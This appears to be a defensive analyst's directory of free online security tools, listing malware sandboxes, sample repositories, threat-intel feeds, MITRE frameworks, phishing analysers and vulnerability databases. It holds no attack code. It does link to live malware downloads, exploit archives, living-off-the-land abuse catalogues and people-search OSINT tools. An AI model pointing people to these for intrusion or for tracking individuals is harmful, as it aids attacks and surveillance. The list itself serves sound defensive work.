This is a list of free online tools that can be used for Blue team analyst to investgate, analyze and collect information for different type of alerts.
- Document referencing
- Download Malwares Samples
- Encoder/Decoder
- Framework
- IOC Feeds
- LoLBaS Projects
- Malware Analysis
- Network
- Phishing
- Reconnaissance
- Sigma
- Social Media
- Threat Intelligence
- Threat Matrix
- URL/IP/Domain analysis
- Vulnerabilities
- Windows built-in feature to use for offensive
| Link | Description |
|---|---|
| Shodan Search modifiers | There are a set of special terms that you can use to refine your search results. |
| VirusTotal Search modifiers | There are a set of special terms that you can use to refine your search results. |
| Link | Description |
|---|---|
| AnyRun | Interactive online sandbox. Also perform sample download from URL. Use the corporate account. |
| Cape | Context's cuckoo sandbox. Also perform sample download from URL. |
| Hybrid-Analysis | CrowdStrike's public sandbox. Also perform sample download from URL. Free account required to download samples. |
| MalShare | The MalShare Project is a collaborative effort to create a community driven public malware repository that works to build additional tools to benefit the security community at large. |
| MalwareBazaar Database | MalwareBazaar is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers. |
| Polyswarm | Crowdsourced Malware Analysis for new and emerging threats. Free and premium services. |
| Triage | Hatching Triage is our state-of-the-art malware analysis sandbox designed for cross-platform support (Windows, Android, Linux, and macOS), high-volume malware analysis capabilities, and malware configuration extraction for dozens of malware families. Free account required. |
| VX-underground | A free Malware repository providing researchers access to samples. |
| VirusBay | VirusBay is a web-based, collaboration platform that connects security operations center (SOC) professionals with relevant malware researchers. |
| VirusShare | A free Malware repository providing researchers access to samples. |
| Link | Description |
|---|---|
| CyberChief | UK GCHQ's free online tool to convert, parse or carry out well over 100 different operations. |
| UnCoder | online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules to help SOC Analysts, Threat Hunters and SIEM Engineers. |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| DISARM Red Framework | The DISARM Red Framework provides a common language for documenting influence operations. When different organisations describe what they're seeing in the same terms, they can share intelligence, and gain a better understanding of actors' manipulative behaviours. | No | 2025-02-20 |
| Mitre Att&ck Enterprise Matrix | The tactics and techniques representing the MITRE ATT&CK® Matrix for Enterprise. | No | 2025-01-16 |
| MITRE ATTACK Flow | With Attack Flow, you will capture the entire attack and communicate what matters | No | 2025-08-15 |
| MITRE ATTACK Flow Builder | Interactive interface of the MITRE ATTACK Flow | No | 2025-08-15 |
| Mitre Att&ck Navigator | Interactive interface of the MITRE ATT&CK Framework which can be use as graphical reference for understanding/following invetsigation. | No | 2025-01-16 |
| Mitre CAPEC | CAPEC™ provide a comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. | No | 2025-01-16 |
| Mitre CREF Navigator | The CREF Navigator™ was developed as a web based relational tool distilling the complex concepts and relationships from NIST SP 800-160 Volume 2 (Rev 1) into useful cyber resiliency terms, tables, and relationship visualizations enabling architectural and engineering analysis. | No | 2025-01-16 |
| Mitre CVE | The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. | No | 2025-01-16 |
| Mitre CWE | Common Weakness Enumeration (CWE™) is a community-developed list of common software and hardware weaknesses. A “weakness” is a condition in a software, firmware, hardware, or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities. | No | 2025-01-16 |
| Mitre DEFEND | A framework in which we encode a countermeasure knowledge base, but more specifically, a knowledge graph. | No | 2025-01-16 |
| Mitre EMB3D | The EMB3D Threat Model provides a cultivated knowledge base of cyber threats to embedded devices, providing a common understanding of these threats with security mechanisms to mitigate them. | No | 2025-01-16 |
| OSWAP BLADE | The OWASP Business Logic Attack Definition (BLADE) Framework, is an open-source knowledge-base created to help cybersecurity professionals identify the phases, tactics and techniques used by adversaries to exploit weaknesses in the business logic of web facing systems (websites and APIs) | No | 2025-08-25 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| C2IntelFeed. | Free and Open Source Threat Intelligence Feeds dedicated to Cobalt Strike C2, Empire C2 and PoshC2. | No | 2025-08-14 |
| Covert Threat Intelligence Feed list | Free and Open Source Threat Intelligence Feeds. | No | 2025-01-16 |
| FireHOL IPList | Analyse all available security IP Feeds, mainly related to on-line attacks, on-line service abuse, malwares, botnets, command and control servers and other cybercrime activities. | No | 2025-01-16 |
| Threat Feeds | Free and open-source threat intelligence feeds. | Yes | 2025-01-16 |
| Threat-intel.xyz | Free and Open Source Threat Intelligence Feeds. | No | 2025-01-16 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| GTFOBins | Curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. | No | 2025-09-02 |
| LOLBAS (Living Off The Land Binaries and Scripts) | Document every binary, script, and library that can be used for Living Off The Land techniques. | No | 2025-09-02 |
| LOLDrivers | Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. | No | 2025-09-02 |
| LOLESXi | LOLESXi features a comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilised in their operations. | No | 2025-09-02 |
| LOLRMM | LOLRMM is a curated list of Remote Monitoring and Management (RMM) tools that could potentially be abused by threat actors. | No | 2025-09-02 |
| LOLOL | A great collection of resources to thrive off the land | No | 2025-09-02 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| AnyRun | Interactive online sandbox. Also perform sample download from URL. | Yes | 2025-01-16 |
| GateWatcher | This site is a resource for security professionals and enthusiasts. Gatewatcher Intelligence is a non-commercial community project. Our list can be used for free by anyone. Feel free to use it. | No | 2025-01-16 |
| Hybrid-Analysis | CrowdStrike's public sandbox. Also perform sample download from URL. Free account required to download samples. | No | 2025-01-16 |
| IRIS-H Digital Forensics | IRIS-H is an online digital forensics tool that performs automated static analysis of files stored in a directory-based or strictly structured formats. The tool produces two types of data views allowing for thorough digital forensics examination. Support Microsoft Office Documents, .lnk and RTF files. | No | 2025-01-16 |
| InQuest Labs | Capable of recursively decompressing, decoding, deobfuscating, decompiling, deciphering, and more. We aim to automate and scale the reverse engineering skill-set of a typical SOC analyst. | No | 2025-01-16 |
| Intezer Analyze Community Edition | Intezer's malware analysis and classification of malwares using code DNA mapping. | Yes | 2025-01-16 |
| Joe Sandbox Cloud Community Edition | Joe Security's sandbox for Windows, Android, MacOS and IOS for suspicious activities. Also perform sample download from URL. | No | 2025-01-16 |
| MalwareConfig | Extract config information from RATs. | No | 2025-01-16 |
| Manalyzer | Manalyzer is a free service which performs static analysis on PE executables to detect undesirable behavior. | No | 2025-01-16 |
| OPSWAT Metadefender | OPSWAT's deep endpoint forensic analysis for malware using several methods. | No | 2025-01-16 |
| Pikker | Free public instance of Cuckoo sandbox | No | 2025-01-16 |
| Polyswarm | Crowdsourced Malware Analysis for new and emerging threats. | No | 2025-01-16 |
| Quicksand.io | Office document malware analysis. | No | 2025-01-16 |
| Sandblast | Check Point's public version of Threat Emulation. | Yes | 2025-01-16 |
| SecondWrite | SecondWrite brings deep learning and forced code-execution to the battle against advanced malware. Our dynamic analysis malware detector uses patented technology to find, execute and characterize hidden code paths that other malware detectors miss. | Yes | 2025-01-16 |
| Talos File Reputation | The Cisco Talos Intelligence Group maintains a reputation disposition on billions of files. This reputation system is fed into the AMP, FirePower, ClamAV, and Open-Source Snort product lines. | No | 2025-01-16 |
| Triage | Hatching Triage is our state-of-the-art malware analysis sandbox designed for cross-platform support (Windows, Android, Linux, and macOS), high-volume malware analysis capabilities, and malware configuration extraction for dozens of malware families. | Yes | 2025-01-16 |
| Valkyrie Comodo | File verdict system. Different from traditional signature based malware detection techniques Valkyrie conducts several analysis using run-time behavior and hundreds of features from a file and based on analysis results can warn users against malware undetected by classic Anti-Virus products. | No | 2025-01-16 |
| VirusTotal | Google's public platform that compare samples analysis from multiple AV vendors and provide basic Threat Intelligence and metadata related to the samples. Note that the analysis are base on signature detection for most AV vendors. | No | 2025-01-16 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| PacketTotal | Simple, free, high-quality PCAP analysis. | No | 2025-02-07 |
| UserAgentString | List over 100 user agent string and provide tool to automatically explain the information found in the User agent string. | No | 2025-02-07 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CheckPhish | Free Scanner to detect phishing & fraudulent sites in real-time. | No | 2025-01-16 |
| Code Beautify | HTML viewer. | No | 2025-01-16 |
| DNSTwister | The anti-phishing domain name search engine. | No | 2025-01-16 |
| Google G Suite Toolbox | Headers parser. | No | 2025-01-16 |
| Is it Phishing | Based on a heuristic technology coupled with machine learning, ISTIPHISHING is efficient against agile and small waves that contain shortened dynamics links. | No | 2025-01-16 |
| MXToolBox | Headers parser. | No | 2025-01-16 |
| Microsoft Email headers Analyzer | Headers parser. | No | 2025-01-16 |
| Phish report | Automatically analyses phishing sites and identifies the best ways you can report it to speed up the takedown process. | No | 2025-01-16 |
| Phishcheck | Find out what's lurking behind that URL. | No | 2025-01-16 |
| PhisHunt | Up-to-date feed of active phishing and scam sites, along with details and quick updates to help you understand this threat. | No | 2025-09-10 |
| Phishtank | PhishTank is a collaborative clearing house for data and information about phishing on the Internet. | No | 2025-01-16 |
| UnPHP | Free service for analyzing obfuscated and malicious PHP code. | No | 2025-01-16 |
| Link | Description |
|---|---|
| BuiltWith | Website profiler, lead generation, competitive analysis and business intelligence tool providing technology adoption, ecommerce data and usage analytics for the internet. |
| Paste Site Search | Search 90+ paste sites. Filter by source & keyword. |
| Link | Description |
|---|---|
| Detection.FYI | TBD |
| Sigma HQ | TBD |
| Sigma Search Engine | TBD |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| BeenVerified | Provide you with access to public information that was formerly only available to big companies and people with deep pockets in a way that is easy, affordable, and fast. For U.S only. | ||
| Checkusernames | Check the use of your brand or username on 160 Social Networks. | ||
| Instagram Explorer | Find images on Instagram by date at particular locations. This tool makes searching easier and more efficient. | No | 2025-02-07 |
| Knowem | Allows you to check for the use of your brand, product, personal name or username instantly on over 500 popular and emerging social media websites. | ||
| Namechk | Free username and domain search tool. We're the fastest and most efficient way for you to search for your desired username across hundreds of social networks and domain extension - all at once. | ||
| Reddit Post Analyzer | Use this OSINT tool to analyze Reddit posts. Enter the post URL to get a downloadable file which outlines comment metadata like time, timezone and username, plus sentiment ranking. | No | 2025-02-07 |
| Social Geo Lens | Conduct geo-searching on social media platforms. The map-based interface makes it easy to use and the design means you remain compliant with relevant terms of service. | No | 2025-02-07 |
| TikTok Quick Search | Search usernames and hashtags on TikTok via a browser. All results take the user to the source on the TikTok.com website or are provided as a Google search result. | No | 2025-02-07 |
| Whatsmyname | Use this OSINT tool to find usernames across many websites. | No | 2025-02-07 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CERT.PL | Yes | 2025-01-16 | |
| CTI Chef | A tool used for cyber threat intelligence (CTI) analysis, specifically focused on analyzing and understanding cybersecurity threats. It may be used to collect, analyze, and disseminate intelligence on cyber threats. | No | 2025-05-27 |
| Group-IB Malware Detonation Reports | Group-IB's Malware Detonation Platform does much more than merely identify good and bad files. It reveals how attacks unfold in real time and pinpoints which processes are executed, which files are created or modified, and what network connections are established. | No | 2025-12-23 |
| IBM X-Force Exchange | Threat Intelligence sharing platform enabling research on security threats, aggregation of intelligence and collaboration with peers. | No | 2025-01-16 |
| Intelligence X | Intelligence X is a search engine and data archive. | No | 2025-01-16 |
| LevelBlue | World's first truly Open Threat Intelligence Community | Yes | 2025-01-16 |
| Malpedia | Provide a resource for rapid identification and actionable context when investigating malware. | No | 2025-01-16 |
| Maltiverse | Analyzes all the possible dimensions and points of view of known and classified IOC's to compare them with the unknown indicators for matching. | No | 2025-01-16 |
| PulseDive | An analyst-centric threat intelligence platform that can provide users with comprehensive community threat intelligence to help identify known threats. | No | 2025-01-16 |
| Lighthouse feed finder | Search for a RSS Feed for a domain. | No | 2025-12-23 |
| ThreatConnect | Threat Intelligence Platform for companies to aggregate and act upon threat intelligence. | Yes | 2025-01-16 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| Cloud Security Alliance Cloud Controls Matrix (CCM) | he Cloud Controls Matrix (CCM) is a cybersecurity control framework that maps to industry best practices and is considered the standard for cloud security and privacy. | Yes | 2025-01-16 |
| Confiant Malvertising Attack Matrix | Detailing threat actors through Malvertising Activity. | No | 2025-01-16 |
| ITM Insider Threat Matrix | ITM is a continually growing framework for Digital Investigators investigating instances of computer-enabled insider threats in organizations of any size. | No | 2025-01-16 |
| MITRE Atlas (AI) | Navigate threats to AI systems through real-world insights. | No | 2025-01-16 |
| MITRE Cloud Matrix | The tactics and techniques representing the MITRE ATT&CK® cloud platforms. | No | 2025-01-16 |
| Microsoft DevOps Threat Matrix | Our goal for developing the threat matrix for DevOps is to build a comprehensive knowledgebase that defenders can use to keep track of and build defenses against relevant attack techniques. | No | 2025-01-16 |
| Microsoft Threat Matrix for Kubernetes | Threat Matrix. | No | 2025-01-16 |
| Microsoft Threat Matrix for Storage Services | The purpose of the threat matrix for storage services is to conceptualize the known tactics, techniques, and procedures (TTP) that adversaries may use against this type accounts. | No | 2025-01-16 |
| OWASP Threat and Safeguard Matrix (TaSM) | The Threat and Safeguard Matrix (TaSM) is an action-oriented view to safeguard and enable the business created by CISO Tradecraft. | No | 2025-01-16 |
| Space Attack Research and Tactic Analysis (SPARTA) matrix | SPARTA is intended to provide unclassified information to space professionals about how spacecraft may be compromised via cyber and traditional counterspace means. | No | 2025-01-16 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| AbuseIPDB | Provide a central blacklist for webmasters, system administrators, and other interested parties to report and find IP addresses that have been associated with malicious activity online. | No | 2025-01-16 |
| BinaryEdge | Scan the entire public internet, create real-time threat intelligence streams, and reports that show the exposure of what is connected to the Internet. | Yes | 2025-01-16 |
| Censys | Uses Internet scan data to give organizations the visibility they need to defend against attacks and improve their overall security hygiene. | Yes | 2025-01-16 |
| Cisco Talos | The Talos IP and Domain Reputation Center is the world’s most comprehensive real-time threat detection network. | No | 2025-01-16 |
| DNSDumpster | Domain research tool that can discover hosts related to a domain. | No | 2025-01-16 |
| DNSlytics | Find out everything about a domain name, IP address or provider. | No | 2025-01-16 |
| SecurityTrails | World's largest repository of historical DNS data. | No | 2025-01-16 |
| Google Safe Browsing | Check site status in Google Safe Browsing database. | No | 2025-01-16 |
| HackerTarget | Domain research tool that can discover hosts related to a domain. | No | 2025-01-16 |
| IPVoid | IP address tools to discover details about IP addresses. | No | 2025-01-16 |
| Ipinfo.io | The most reliable, accurate, and in-depth source of IP address data available anywhere. | No | 2025-01-16 |
| Lookyloo | Tool developed by CIRCL (the Luxembourg CERT) that helps to have a quick overview of a website by scraping it and displaying a tree of domains calling each other. | No | 2025-01-16 |
| MultiRBL | IP check for sending Mailservers. | No | 2025-01-16 |
| Onyphe | Search engine for open-source and cyber threat intelligence data collected by crawling various sources available on the Internet or by listening to Internet background noise. ONYPHE does correlate this information with data gathered by performing active Internet scanning for connected devices. | No | 2025-01-16 |
| Robtex | Gather public information about IP numbers, domain names, hostnames. Autonomous systems, routes, etc. | No | 2025-01-16 |
| SSL Blacklist | List of "bad" SSL certificates identified by abuse.ch to be associated with malware or botnet activities. | No | 2025-01-16 |
| ScreenshotMachine | Online tool that creates screenshots of websites in a safe way. | No | 2025-01-16 |
| Shodan | The world's first search engine for Internet-connected devices. | No | 2025-01-16 |
| ThreatMiner | Free analysis from data collection and provide intelligence analysis. | No | 2025-01-16 |
| URLVoid | Analyze a website through multiple blacklist engines and online reputation tools. | No | 2025-01-16 |
| URLscan.io | Analyse websites and the resources they request. it will let you take a look at the individual resources that are requested when a site is visited. | No | 2025-01-16 |
| VirusTotal | Compare URL categorization from multiple URL filtering solutions vendors. | No | 2025-01-16 |
| ZoomEye | Cyberspace Search Engine recording information of devices, websites, services and components, etc. | No | 2025-01-16 |
| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CVE2EPSS | No | 2025-05-27 | |
| CVEdetails.com | CVEdetails.com offers a complete CVE database enhanced with additional information including advisories, exploits, tools, source code changes and much more. | No | 2025-01-16 |
| Exploit Database | Archive of Exploits, Shellcode and security papers. | No | 2025-01-16 |
| National Vulnerability Database (NVD) | A collection of vulnerability data that helps security professionals identify and fix cyber threats. The NVD is maintained by the National Institute of Standards and Technology (NIST). | No | 2025-01-16 |
| The Open Cloud Vulnerability & Security Issue Database | An open project to list all known cloud vulnerabilities and CSP security issues. | No | 2025-01-16 |
| VulDB | Vulnarability database worldwide with more than 111 000 entries available. | No | 2025-01-16 |
| Vulmon | Vulmon is a vulnerability search engine with vulnerability intelligence features. Vulmon conducts full text search in its database; therefore, you can search everything related to vulnerabilities. It includes CVE ID, vulnerability types, vendors, products, exploits, operating systems and anything else related to vulnerabilities. | No | 2025-01-16 |